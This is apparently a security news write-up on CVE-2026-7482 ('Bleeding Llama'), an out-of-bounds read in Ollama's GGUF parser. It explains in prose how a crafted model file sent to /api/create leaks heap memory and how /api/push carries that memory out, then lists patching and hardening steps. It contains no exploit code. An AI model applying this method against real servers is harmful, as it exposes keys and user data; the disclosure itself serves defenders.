‘Bleeding Llama’: Critical Ollama Vulnerability Exposes Memory on 300,000 Servers

A critical out-of-bounds read vulnerability in Ollama, dubbed Bleeding Llama, allows unauthenticated attackers to dump process memory via malicious GGUF files.…

On May 12, 2026, Cyera disclosed CVE-2026-7482, a critical flaw in Ollama that allows unauthenticated remote attackers to leak the entire memory space using a manipulated GGUF file. Dubbed "Bleeding Llama," the vulnerability affects approximately 300,000 internet-exposed servers and numerous LAN instances, turning model uploads into a vector for stealing secrets and proprietary data. The lack of default authentication and a GGUF parser that fails to validate tensor dimensions enable data exfiltration through legitimate endpoints.

Key Takeaways

The root cause is a heap out-of-bounds read in Ollama’s GGUF parser: a model file with inflated tensor offsets and sizes bypasses allocated buffers during conversion in ggml_fp16_to_fp32_row within the WriteTo() function.
The attack requires no authentication: the /api/create endpoint accepts the malicious GGUF file, while /api/push allows the attacker to exfiltrate leaked memory to a controlled registry.
At-risk data includes environment variables, API keys, system prompts, concurrent user conversations, and proprietary code; the vulnerability carries a CVSS score of 9.1.
Beyond the 300,000 publicly reachable servers, many instances are exposed on local networks without authentication, frequently listening on 0.0.0.0 rather than localhost.

Manipulated Tensors and Heap Out-of-Bounds Reads

The bug resides in the GGUF model loader, specifically within fs/ggml/gguf.go and server/quantization.go. According to Cyera’s analysis, the Elements() function calculates the expected tensor size based on its shape. If an attacker declares inflated offsets and sizes, the ggml_fp16_to_fp32_row conversion loop—invoked by WriteTo()—reads beyond the allocated heap buffer because the code fails to validate the actual dimensions of the uploaded file.

The issue is concentrated in the quantized tensor conversion functions, where the calculation of expected elements is not anchored to the actual size of the data blob in the file. This misalignment allows the pointer to be pushed beyond the allocated area, leveraging Go’s unsafe package to access memory regions otherwise unreachable in pure Go code.

The quantization path utilizes Go’s unsafe package for low-level operations, bypassing the language's typical memory safety guarantees. In this specific workflow, a parsing error translates into an arbitrary read of the process memory, exposing environment variables, API keys, and fragments of concurrent user sessions.

The Double API Call: Leak and Exfiltration

The exploit requires no credentials. An attacker sends a specially crafted GGUF file to the /api/create endpoint, which Ollama accepts into its loading pipeline. During quantization, the tensor with falsified dimensions triggers the out-of-bounds read, dumping blocks of heap memory into the new model artifact.

The attacker then uses the /api/push endpoint to upload the resulting model to an external registry under their control. The GGUF file, appearing legitimate to the system, contains the leaked data, enabling exfiltration without the need for side channels or additional malware on the target.

Because /api/push is a standard feature, it serves as a legitimate transport mechanism to move sensitive information out of the infrastructure once it has been embedded into the model artifact.

Unauthenticated Inference and the Attack Surface

Ollama is frequently deployed in enterprise environments for local inference on open-weights models, but default configurations often leave it overexposed. The framework does not enable authentication out-of-the-box and is often configured to listen on 0.0.0.0 instead of localhost, opening the API to the LAN or, in many cases, the public internet.

Attack surface scans indicate approximately 300,000 publicly reachable Ollama servers. The project, which boasts over 171,000 GitHub stars and nearly 100 million Docker Hub downloads, has been widely adopted by developers and DevOps teams who must now verify the isolation of their instances from core infrastructure.

The proliferation of Ollama in CI/CD pipelines and AI development environments has led many teams to expose the API for convenience, often within Docker containers using direct port mapping. This practice, combined with the lack of native authentication, converts an inference instance into a potentially public service even when the intent was to keep it internal.

The Stakes: What a Memory Leak Reveals

The content of the leaked memory depends on what the Ollama process was handling at the time of the attack. In tests conducted by researchers, the address space revealed environment variables, API keys, system prompts, concurrent user conversations, and proprietary code undergoing inference. The CVSS score of 9.1 reflects the ability to extract high-sensitivity information without authentication and with minimal interaction.

It is not possible to determine beforehand which specific bytes will be read beyond the buffer. However, an attacker can iterate the process with different tensor configurations to increase the probability of capturing high-value memory segments. Each attempt produces a model artifact encapsulating fresh leaked data, ready for exfiltration.

"An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more"
Dor Attias, Cyera security researcher

Mitigation and Security Hardening

Update immediately to Ollama 0.17.1 or later to resolve the vulnerability.
Verify the instance binding address, disabling 0.0.0.0 and restricting access to localhost or trusted network segments.
Rotate any API keys, tokens, and credentials present in memory, assuming they may have been compromised if the server was internet-facing.
Isolate inference instances from the rest of the corporate network, applying firewalls and segmentation to limit the attack surface even within the LAN.

The Bleeding Llama case is not a traditional web server vulnerability; it is a point where the AI model supply chain meets the fragility of parsing code. When a model file becomes a remote exploit and local inference lacks authentication, the security perimeter collapses at the level of a single tensor. For organizations, this means AI governance and DevOps hardening must be treated with the same urgency as any other public-facing asset.

Frequently Asked Questions

Is a LAN-only server still at risk?

Yes. The lack of default authentication allows any internal actor or compromised process to invoke /api/create and /api/push. LAN segmentation reduces, but does not eliminate, the threat.

Does the GGUF file need to mimic a known model?

No. The /api/create endpoint accepts GGUF files with arbitrary metadata. Ollama processes the declared tensor without validating its consistency against the actual file size, making the deception transparent to the system.

Is the leaked data viewable in plain text within the exfiltrated model?

Yes. The heap memory read beyond the limits is encapsulated in the model artifact and can be extracted by the attacker after it is pushed to an external registry, allowing for data recovery outside the compromised infrastructure.

Information has been verified against cited sources and is current as of the time of publication.